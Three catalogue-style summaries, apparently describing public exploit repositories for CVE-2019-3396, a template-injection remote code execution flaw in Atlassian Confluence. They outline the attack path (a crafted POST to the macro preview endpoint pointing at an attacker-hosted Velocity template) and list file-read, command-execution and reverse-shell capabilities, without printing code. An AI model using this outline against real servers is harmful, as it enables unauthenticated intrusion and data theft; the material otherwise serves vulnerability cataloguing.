Atlassian Confluence Widget Connector SSTI RCE

This repository provides a working exploit for CVE-2019-3396, a critical remote code execution (RCE) vulnerability in Atlassian Confluence (versions 6.6.0-6.6.11, 6.12.0-6.12.2, 6.13.0-6.13.2, 6.14.0-6.14.1). The vulnerability is due to a server-side template injection (SSTI) in the Widget Connector macro, which allows unauthenticated attackers to execute arbitrary system commands on the server. The repository contains four files: - `README.md`: Detailed description of the vulnerability, affected versions, exploitation steps, and mitigation advice. - `poc.py`: A Python proof-of-concept script that automates exploitation. It sends a crafted POST request to the vulnerable `/rest/tinymce/1/macro/preview` endpoint, instructing the server to fetch and execute a malicious Velocity template from an attacker-controlled FTP server. The script takes the target URL and a command to execute as arguments, and prints the command output if successful. - `cmd.vm`: The malicious Velocity template that executes arbitrary system commands on the target server and returns their output. - `LICENSE`: Creative Commons CC0 license. To use the exploit, the attacker must host `cmd.vm` on an FTP server (e.g., using `pyftpdlib`), then run `poc.py` with the target Confluence URL and the desired command. The exploit is operational and provides full remote code execution capabilities. The main attack vector is network-based, targeting the Confluence REST API endpoint. The repository also demonstrates file read capabilities (e.g., reading `/etc/passwd`). No detection scripts are included; the code is focused on exploitation. The exploit is not part of a larger framework and is self-contained.

This repository provides a working exploit for CVE-2019-3396, a server-side template injection (SSTI) vulnerability in Atlassian Confluence's /rest/tinymce/1/macro/preview endpoint. The main exploit script (RCE_exp.py) is written in Python and allows an attacker to execute arbitrary system commands on a vulnerable Confluence server. The exploit works by instructing the target server to fetch and process a malicious Velocity template (cmd.vm) hosted by the attacker via FTP or HTTPS. The cmd.vm file contains Velocity code that executes arbitrary commands passed via the HTTP request. The repository includes: - RCE_exp.py: The main exploit script, which can read files or execute commands on the target. - cmd.vm: The malicious Velocity template used to trigger command execution. - README.md: Usage instructions and a brief description of the exploit. The exploit requires the attacker to host cmd.vm on an FTP or HTTPS server and to provide the target Confluence URL and desired command as arguments. The exploit is operational and demonstrates successful command execution, returning the output to the attacker.

This repository provides a working exploit for CVE-2019-3396, a remote code execution vulnerability in Atlassian Confluence. The exploit consists of a Python script (cve-2019-3396.py) that sends a crafted POST request to the vulnerable /rest/tinymce/1/macro/preview endpoint. The request abuses the macro preview functionality by supplying a _template parameter that points to a malicious Velocity template (r.vm) hosted on an attacker-controlled FTP server. This template enables arbitrary command execution on the target server. The README.md provides detailed usage instructions, including how to set up the FTP server, example payloads for file reading, command execution, and reverse shell access. The exploit is operational and demonstrates full RCE capabilities, including file read, command execution, and reverse shell. The main fingerprintable endpoints are the Confluence macro preview API and the attacker's FTP server hosting the malicious template.